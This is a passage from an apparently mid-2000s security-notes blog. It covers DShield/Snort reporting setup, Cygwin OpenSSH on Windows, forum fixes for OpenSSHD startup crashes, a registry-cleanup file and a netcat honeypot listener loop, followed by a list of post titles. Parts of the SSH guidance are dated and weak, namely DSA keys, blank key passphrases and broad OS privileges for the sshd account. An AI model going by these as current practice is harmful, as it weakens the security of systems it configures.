   log=/var/log/messages
   sendmail=/usr/sbin/sendmail -oi -t
   whereto=MAIL
   source_exclude=/etc/dshield/dshield-source-exclude.lst
   target_exclude=/etc/dshield/dshield-target-exclude.lst
   source_port_exclude=/etc/dshield/dshield-source-port-exclude.lst
   target_port_exclude=/etc/dshield/dshield-target-port-exclude.lst
   obfus=N
   linecnt=/tmp/dshield.cnt
   verbose=N
   debug=Y
   rotate=N
  Save and exit.

Copy the snort and snort portscan config files into the /etc/dshield directory as dshield_snort.cnf and dshield_snort_portscan.cnf files. Perform the same procedure on them, only use dshield_snort.cnt or dshield_portscan.cnt for the linecnt variable. When complete, the /etc/dshield directory should contain the following:

   root@www bin# ls -1 /etc/dshield
   dshield_iptables.cnf
   dshield_snort.cnf
   dshield-source-exclude.lst
   dshield-source-port-exclude.lst
   dshield-target-exclude.lst
   dshield-target-port-exclude.lst
   dshield_snort_portscan.cnf

CREATING THE PRODUCTION SCRIPTS

Install the perl scripts into the /usr/bin directory.

   cd /usr/local/src
   cp iptables/iptables.pl /usr/bin
   cp snort_18_syslog/snort_18_syslog.pl /usr/bin
   cp snort_portscan/snort_portscan.pl /usr/bin

Once you have test scripts that work when executed manually, copy the launching scripts into the /usr/local/bin folder.

   cd /usr/local/src
   cp iptables/test_wrapper.sh /usr/local/bin/dshield_iptables
   cp snort_portscan/test_wrapper.sh /usr/local/bin/dshield_snort_portscan
   cp snort_18_iptables/test_wrapper.sh /usr/local/bin/dshield_snort

When done, the folder should look similar to this:

   root@www bin# ls
   dshield_iptables  dshield_snort  dshield_snort_portscan

Create a script to launch all of the others at /usr/local/bin/dshield.

   root@www bin# cat /usr/local/bin/dshield
    #!/bin/bash
   /usr/local/bin/dshield_iptables
   /usr/local/bin/dshield_snort_portscan
   /usr/local/bin/dshield_snort

Create the /var/log directory for dshield.

   mkdir /var/log/dshield

Edit the scripts for production use.

   cd /usr/local/bin
   vi dshield_iptables
  Comment out the "echo "20021201000000" > dshield.cnt" line.
  Change the executable line to read "/usr/bin/iptables.pl -config=/etc/dshield/dshield_iptables.cnf > /var/log/dshield/iptables_debug.txt"
  Save and exit.

   vi dshield_snort
  Comment out the "echo "20021201000000" > dshield.cnt" line.
  Change the executable line to read "/usr/bin/snort_18_syslog.pl -config=/etc/dshield/dshield_snort.cnf > /var/log/dshield/snort_syslog_debug.txt"
  Save and exit.

   vi dshield_snort_portscan
  Comment out the "echo "20021201000000" > dshield.cnt" line.
  Change the executable line to read "/usr/bin/snort_portscan.pl -config=/etc/dshield/dshield_snort_portscan.cnf > /var/log/dshield/snort_portscan_debug.txt"
  Save and exit.

AUTOMATING SUBMISSIONS

Edit the root crontab file to execute the scripts.

   crontab -e
  Add a line with "20 * * * * /usr/local/bin/dshield".  This will execute the script on the :20 minute every hour.
  Save and exit.

FINAL TESTING

Execute the dshield script manually to test it. Make sure the three submission emails are received.

   /usr/local/bin/dshield

WRAPPING UP

Once running well, the submission emails can be curtailed by editing the /etc/dshield/*.cnf files and blanking out the "cc=" email addresses.

Cygwin Documentation for Installing OpenSSH on Windows 2003

2005-02-21T03:00:00.000-05:00

Tested on Windows 2003.

If you have trouble, this is also a good resource

http://www.cs.bham.ac.uk/~smp/projects/ssh-windows/

Cygwin Installation Instructions - Optimized for SSH

Purpose
Provide method of secure file transport. This allows for new files to be updated on the servers and for backups between servers to take place securely.

Pre-Installation
See the SSH Installation document for account setup steps that must occur prior to installing Cygwin.

Installation
1) Launch the Setup program.

2) When the setup program starts, click "Next."

3) Select "Install from Local Directory" if you already have the install files downloaded. Otherwise select "Install from Internet." Click next. See below.

4) Enter the desired root directory for Cygwin. This will be the '\' directory in the shell. Install Cygwin "For All Users," otherwise you will have problems with permissions. Pick a text file type (recommend Unix).

5) Set the local package directory if you are installing from local directory. Otherwise select your download site.

6) On the next screen, make sure to have the Cygwin base files and OPENSSH packages installed. I recommend installing OPENSSL as well.

7) The program sets off installing Cygwin packages. This may take a few minutes. When it does get to the next screen, select install Start Menu shortcuts. Click Next.

8) See Install SSH with PKA document for further instruction on setting up SSH services.

Setting up Secure Shell with Public Key Authentication Capability on Cygwin

Pre-Installation
Before installing Cygwin on the server, follow these steps as the administrator account:

1) Open the User/Group manager and create group "grsshd" and user "sshd".

2) Make "sshd" a member of group "grsshd".

3) Install Cygwin as detailed in the Install Cygwin For SSH document.

Installation
Do this after installing Cygwin. Log into the SSH server machine as the system administrator.

1) Execute the following commands from the Cygwin shell:

 $ ssh-host-config -y
 $ touch /var/log/sshd.log
 $ chown sshd:grsshd /var/empty /var/log/sshd.log /etc/ssh*

2) Open the Services Manager. Open the properties for "Cygwin sshd" service. Navigate to the "Log On" tab. Set the service to use the ".sshd" account and enter the password for the account. Press OK.

3) Open the Local Security Policy manager. Navigate to Local Policies -> User Rights Management. Change the following settings to include the account "sshd":

Act as part of operating system
Replace process level token
Adjust memory quotas for a process
Login as service

Close the Policy Manager.

4) Run "cygrunsrv -S sshd". If no errors, run "cygrunsrv -Q sshd" for status of the service. The SSHD service is now established. Proceed to the next section if your account will be pursuing Public Key Authentication.

Establishing Public Key Authentication
These instructions assume you are logged into the client machine and are using OpenSSH (Cygwin) to connect to the SSH server. If you are using another client product, such as Putty, the commands will be slightly modified, but the process is the same. Modify commands as per the requirements of your software.

Cygwin has some limitations with regard to PKA. PKA on the server can only be set up on the account under which the SSHD daemon (service) is run. That means for PKA logins, the connection will always log in as the "sshd" account on the remote server. If you desire access to your own account, you will have to run "ssh " and enter a password, assuming you have previously established your account on that server.

To establish PKA to the "sshd" account, perform the following steps:

1) Generate the DSA keys for SSH protocol 2 authentication. Open a Cygwin shell and execute "ssh-keygen -t dsa". Answer all questions with blanks.

2) Generate the RSA keys for SSH protocol 2 authentication. Execute "ssh-keygen -t rsa". Again, answer blank to all questions.

3) Run "ssh -l sshd ". Enter the password for the "sshd" account you set up while establishing the SSH process on the server. You should now have a prompt at the remote server under the account "sshd".

4) Run "ssh localhost" to generate a .ssh/known_hosts file. This gets the directory established with the proper permissions if it does not yet exist. Enter the password for "sshd" again.

5) Type "exit" and "exit" again. You should have a prompt at your local machine under your normal user account.

6) Move to your own keys directory. Run "cd .ssh".

7) Prepare your public keys for transport to the server. Create a directory to hold your public keys with "mkdir pub". Copy your keys into this new folder with "cp *.pub pub". Adjust the ownership with command "chown -R sshd:grsshd pub".

8) Transfer the keys to the remote SSH server. "scp -r pub sshd@:~/.ssh" You will be prompted for a password. Enter the password for the "sshd" account on the remote server. Watch the status as the files transfer.

9) When done, initiate a shell to the remote server to prepare the keys for use. Run "ssh -l sshd " and enter the "sshd" password. You should now have a prompt indicating you are on the remote SSH server as the "sshd" account.

10) Navigate to your keys with "cd .ssh/pub".

11) Add your keys to the authorized keys file. This will perform the actual authentication the next time you log in. "cat *.pub >> ../authorized_keys".

12) Leave the remote server. Type "exit". You should now be at your local machine as your normal account.

13) Test the public key authenticator. Run "ssh -l sshd ". You should receive no password prompt and should be immediately logged in as the "sshd" account on the remote SSH server.

14) Type "exit" to leave the server. Your account is now set up for automatic Public Key Authentication to the SSH server.

OpenSSHD service / Windows XP startup / crashing / instability problem and solution

Dr. Daniel Schmidt
April 02, 2005
from SSH-L listservice (ssh@erdelynet.com)

Hi all,

I recently discovered something interesting and wanted to share it with the list, in the event that someone else will avoid frustrations similar to my own.

I installed OpenSSH for Windows 3.8.1p1 on an XP Pro (SP2) server machine I administer in our research group. Setup was easy and it ran quietly and effectively (once I told the Windows firewall to let it do so via port 22, of course), but I noticed that I had to log in and manually start the OpenSSH service every time the server rebooted (XP is set on autoupdate, so this does indeed happen from time to time). That was a bit annoying, so I enabled automatic startup via Administrative Tools --> Services.

Then, the fun began. After a reboot, I got a BSOD / immediate reboot two or three times in a row before it finally was able to get into Windows, and when it did so, I was getting all *kinds* of errors. Very, very ugly. I tested a bunch of different things related to what else was starting up, tried replacing the Windows firewall with ZoneAlarm, altered some of the other Services starting, but all to no avail - It would make it into Windows maybe half the time, and even when it did, it was not at all stable or behaving properly.

I noted recently that others have had problems with OpenSSHD for Windows with respect to the fact that, when the Service is set to start automatically, it apparently tries to do so before it "should", making the system as a whole very, very unhappy. I'd suspected something similar on our server, and from this article:

http://support.microsoft.com/default.aspx?scid=kb;EN-US;q193888

...modified the OpenSSHD Service's registry entry a bit. I noted that the TCIP/IP service was already listed in the "DependOnService" list, so I figured it was probably some other network-related service, maybe the firewall or the antivirus package we're running (Symantec Antivirus Corporate Edition 9). What I decided to do, instead of trying to guess which of the hundred services I needed to have it depend on, was to look here, for the list of Service Groups (I suggest RegEdt32 so that the list doesn’t look like total crap):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceGroupOrder

The Service Groups are listed here in the order Windows starts them. I noted that "Network Provider" was near the bottom of the list, and it certainly seemed reasonable that I would need to be finished starting before OpenSSHD tried to do anything, so I added "Network Provider" to my "DependOnGroup" entry, found here:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\OpenSSHD

...and it worked fine after that. When in doubt, I would say, just choose the absolute last thing on the Services Groups list and put that in OpenSSHD's "DependOnGroup" entry; this will ensure that it waits until everything else is done before it attempts to start.

Our server survives now rebooting with no problems, and OpenSSHD always starts as it should, with no user intervation (hooray!). To be fair, I'm not the first to try something like this - One can find mention of something like this in an obsolete readme file, here:

http://www.networksimplicity.com/openssh/source/readme.txt

See Troubleshooting (8). Things must've changed since then, however, as this file indicates that "The OpenSSHd service depends on the Computer Browser service so that it starts in the correct order," which is not what I found in my registry.

On my Win2K box at home, on the other hand, and the aforementioned Service Group "Network Provider" does not exist on it; clearly I would have to do something different here than on the aforementioned XP Pro server. It's therefore quite difficult to decide on an appropriate and general dependency for this service, since it's clear that things change quite a bit between various versions of Windows (all to the benefit of the consumer, no doubt) - For the moment it looks like this fix has to be applied on a case by case basis. One further warning, the XP SP2 update renames / changes the default startup values for some services, so we can’t assume that any two MS OS installs with the same name will be "the same" when it comes to such things.

Hope this helps,

Dr. Daniel Schmidt

SSHWindows installation resolution

Original Message----- From: ssh-owner@erdelynet.com mailto:ssh-owner@erdelynet.com On Behalf Of Robert Jacobson Sent: Wednesday, May 18, 2005 7:43 AM To: ssh@erdelynet.com Subject: Re: Automatic Start of opensshd service

At 4:59 PM +0200 5/18/05, M. Franco max-lists-at-ycom.ch |ssh_erdelynet| wrote: >Hi, > >I also have this problem since a reboot after the installation of the >OpenSSHd service. > >I noticed that if I manually start it after a reboot, the service works >well, but not if it's started automatically. > >Note: I use the local system account for this service. > >Anybody got an idea about this ?

This is a now-classic problem with the sshwindows distribution from sourceforge. It is *broken*, and hasn't been updated in about 10 months now.

If you want a working openssh for windows, you will have to first UNINSTALL sshwindows. Make sure you remove the registry keys under HKLM and HKCU for "Software\Cygnus Solutions". (the uninstaller may do this already...

Then install Cygwin (www.cygwin.com). During setup, install the packages:

 cygrunsrv
 openssh


 rebase

(in addition to the default packages)

After cygwin is installed, start cygwin and run the command:

 ssh-host-config -y

After that, things *should* work -- but maybe not. I've had several problems with permissions and such.

-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Robert Jacobson sohorob@pobox.com BS, Aeronautical Engineering Univ. of Md., College Park Flight Ops. Team - SOlar Heliospheric Observatory (SOHO) -

Cleanup the Cygwin Registry on Removal

REGEDIT4

[-HKEY_LOCAL_MACHINE\Software\Cygnus Solutions]

[-HKEY_CURRENT_USER\Software\Cygnus Solutions]

[-HKEY_USERS\.DEFAULT\Software\Cygnus Solutions]

Persistent Netcat Listeners for Honeypots

2005-02-19T03:00:00.000-05:00

This ISC article was so good, I had to reprint it for posterity if they ever decided to archive it.

from SANS Institute Internet Storm Center
by Ed Skoudis
http://isc.sans.org/diary.php?date=2005-02-18

The other day, we asked readers to set up honeypot listeners using Netcat to capture some of the malicious code trying to hit TCP port 41523. Now, one of the problems with the most popular Linux/UNIX implementation of Netcat (that is, Hobbit's original) is that it does not create a persistent listener. Unlike the Windows version of Netcat (with its -L option for "Listen Harder"), the original UNIX/Linux version doesn't do this. Once one client connects and drops, the listener dies.

There are many ways to get around this problem, such as using a different version of Netcat. However, one of my favorite simple ways to deal with this is to set up the Netcat listener in a while loop as follows:

 $ while [ 1 ]; do echo "Started"; nc -l -p 41523 >> capture.txt; done

This will listen on TCP 41523, append whatever it receives to capture.txt, and then start listening again.

If you'd like to go further and actually log out while keeping this thing running, you can simply dump this while line in a file, called honeypot.sh. Then, chmod it so that it is executable (chmod 555 honeypot.sh). Finally, invoke it as follows:

 $ nohup ./honeypot.sh &

Then, logout and go watch some TV. Take a nap. Run naked through the park. Do whatever it is that you do...

Come back, and your little Netcat buddy will be running with its results stored in capture.txt. To kill it, you could simply kill the pid of the nc listener itself. Thanks to Don Smith for the nohup idea. Note that Don did NOT suggest the park idea.

Notes on Security and Research

Analysis of a Freshly Installed Windows 7's Teredo Tunneling Traffic

Building a Debian/Ubuntu Package for DNSCrypt-proxy

Bigger Sets to Visualize

Visualizing and Investigating a Distributed Scan

Review of a Clean Android Installation

Ecryptfs and profile errors

Scanning Memory Objects with Yara

Installing Yara on Ubuntu 10.04

Installing log2timeline on Ubuntu

Verizon FIOS Faux Paus

Automating PDF Analysis

Quick shell script to extract the contents of an image

Idea for enterprise scanning

Opinion on SMTP Honeypots

So You Thought You Were in Control of Your Friend List

SSH Command Monitoring

Open Source Security Information Manager - OSSIM

Suggestions for Security Training

Deobfuscating the Adobe 0-day

USB as a Threat Vector

Script to identify domains and IP addresses by ASN and CC

Malicious Flash Badness

Automated Shellcode Analysis

Phish Me

Idea for End-point Javascript Obfuscation Blocking

Getting Started

Reconstituting Base64 Attachments

Creating a Void11 Counter-Offensive Wi-Bomb on Auditor

Better WHOIS Lookups

Javascript Decoding

Finding Files and Counting Lines at the Windows Command Prompt

Determining USB Keys in Windows

Perl Scripting to Decode Encoded or Escaped Pages

Security Apache/PHP

Searching for a File of a Given Date in DOS

Cursory Malware Analysis Techniques with Common Tools

Get BackTrack

Getting Started

Collecting Samples

Gathering Records

Analysis

Network Disk Imaging

Fun with Windows Netstat

Malware Analysis Toolkit

Checking for Null Sessions

DNS Transfer Enumeration

Uses for a DNS Cache Poison

Encrypted Malware and Code Reusability

Car Webcam Surveillance System

Main Idea: LINUX-based Web Cam Recorder

Option: Wireless Sync to a base server

Alternate Setup: Bootable LINUX CD

Clustered Intruson Detection System

Securing Wireless: Presentation Notes

Course 1 - Implementing Wireless Security

Agenda

Course 2 - Auditing Wireless Security

Agenda

Wireless Overview Notes

Agenda

Password Rules for Kids

Creating a Vericept Instance in VMWare

Take Care of Your Laptop

Linksys BEFW11S4

Public Wireless Diversion

Netgear WSG11v1 54Mbs 802.11g PCMCIA Wireless Adapter

SMC 2835 802.11b PCMCIA Client Adapter

Intel Centrino 802.11b mini-PCI Client Adapter

Cisco 340 802.11b PCMCIA Client Adapter

Linksys WRT54G

Satire on Government-Regulated Computer Security

Centralizing Syslogs

Set Up a Syslog Server

Snort Documentation for Creating a Distributed Intusion Detection System on Fedora

Integrating Snort with DShield for Automated Reporting of Violators to ISPs.

Cygwin Documentation for Installing OpenSSH on Windows 2003

Cygwin Installation Instructions - Optimized for SSH

Setting up Secure Shell with Public Key Authentication Capability on Cygwin

OpenSSHD service / Windows XP startup / crashing / instability problem *and* solution

OpenSSHD service / Windows XP startup / crashing / instability problem and solution